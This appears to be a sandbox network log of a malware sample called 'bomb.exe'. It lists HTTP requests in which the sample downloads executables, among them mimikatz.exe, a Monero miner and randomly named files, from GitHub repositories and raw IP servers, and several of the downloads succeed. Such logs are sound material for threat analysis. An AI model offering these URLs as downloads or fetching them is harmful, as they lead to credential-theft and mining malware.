GET /KREveDko3221/porno/main/mosssssttttt.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 404 Not Found

Connection: keep-alive
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 5C16:252E5C:ABD4E:1BF97A:67B9FCBA
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4261-LON
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1740242108.273019,VS0,VE79
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: b061f81422a12e134cf62d3ebbd126c29ee5fc13
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/toxicxz/fnaf-1/main/fuscagame.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /toxicxz/fnaf-1/main/fuscagame.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 404 Not Found

Connection: keep-alive
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 3353:310B08:90BD7:15C89C:67B9FCBB
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4261-LON
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1740242108.352673,VS0,VE127
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c760c747c5f872d6387d301a221ed011be4390a6
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Dpose.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/Dpose.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 896512
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "536231bf85163d828fa48fc302d4db3fdd96378d323b2244ba70c7d516b3b8ca"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 7928:244581:FB6A8:291CBB:67B9FC07
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:20 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4261-LON
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1740242121.673263,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: b6c417b8ecf19ec80cf080f8992f697ad5e679e9
Expires: Sat, 22 Feb 2025 16:40:20 GMT
Source-Age: 192
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/mimikatz.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/mimikatz.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/ncpa.cpl

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/ncpa.cpl HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/toyour.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/toyour.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://github.com/BARHOM1/brobr/raw/main/WindowsServices.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /BARHOM1/brobr/raw/main/WindowsServices.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:03 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/BARHOM1/brobr/main/WindowsServices.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: A418:9277D:6DC0FA:928101:67B9FCBC
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/Bootxr.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/Bootxr.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:13 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Bootxr.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: A418:9277D:6DC68D:928843:67B9FCBC
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/Dpose.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/Dpose.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:14 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Dpose.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: A418:9277D:6DC69E:928854:67B9FCC8
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/mimikatz.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/mimikatz.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:15 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/mimikatz.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: A418:9277D:6DC6CE:928897:67B9FCC8
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/ncpa.cpl

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/ncpa.cpl HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:16 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/ncpa.cpl
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: A418:9277D:6DC6F2:9288C9:67B9FCC9
GET

http://185.215.113.75/files/AceHack/launcher.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/AceHack/launcher.exe HTTP/1.1
Host: 185.215.113.75
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/748049926/uXivbut.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/748049926/uXivbut.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/8062377012/DF9PCFR.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/8062377012/DF9PCFR.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5765828710/8QQOJj9.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5765828710/8QQOJj9.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5529495950/ftS1RPn.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5529495950/ftS1RPn.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:09 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/Lisan7/random.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/Lisan7/random.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:09 GMT
Content-Type: application/octet-stream
Content-Length: 139264
Last-Modified: Sat, 22 Feb 2025 15:04:02 GMT
Connection: keep-alive
ETag: "67b9e762-22000"
Accept-Ranges: bytes
GET

http://185.215.113.75/files/6012304042/7tzlyz8.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/6012304042/7tzlyz8.exe HTTP/1.1
Host: 185.215.113.75
GET

http://185.215.113.75/files/z1nk0v/random.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/z1nk0v/random.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: application/octet-stream
Content-Length: 6896640
Last-Modified: Fri, 21 Feb 2025 18:10:49 GMT
Connection: keep-alive
ETag: "67b8c1a9-693c00"
Accept-Ranges: bytes
GET

http://185.215.113.75/files/6802558212/lwtLxxH.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/6802558212/lwtLxxH.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:17 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/6200055128/8UC4ja1.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/6200055128/8UC4ja1.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5526411762/vrEUQZB.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5526411762/vrEUQZB.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5529495950/qlYCb40.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5529495950/qlYCb40.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5024067327/3omTNLZ.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5024067327/3omTNLZ.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5659220883/GUbAWAz.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5659220883/GUbAWAz.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.75/files/5526411762/iStpFTx.exe

bomb.exe

Remote address:

185.215.113.75:80

Request

GET /files/5526411762/iStpFTx.exe HTTP/1.1
Host: 185.215.113.75

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:19 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://185.215.113.66/xmrminer.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /xmrminer.exe HTTP/1.1
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: application/octet-stream
Content-Length: 2621440
Last-Modified: Fri, 21 Feb 2025 00:51:03 GMT
Connection: keep-alive
ETag: "67b7cdf7-280000"
Accept-Ranges: bytes
GET

http://185.215.113.66/del2.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /del2.exe HTTP/1.1
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 29184
Last-Modified: Thu, 20 Feb 2025 02:12:40 GMT
Connection: keep-alive
ETag: "67b68f98-7200"
Accept-Ranges: bytes
GET

http://185.215.113.66/minedelll.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /minedelll.exe HTTP/1.1
Host: 185.215.113.66
GET

http://twizt.net/newtpp.exe

http185.215.113.66pei.exe.exe

Remote address:

185.215.113.66:80

Request

GET /newtpp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: twizt.net

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:10 GMT
Content-Type: application/octet-stream
Content-Length: 80896
Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
Connection: keep-alive
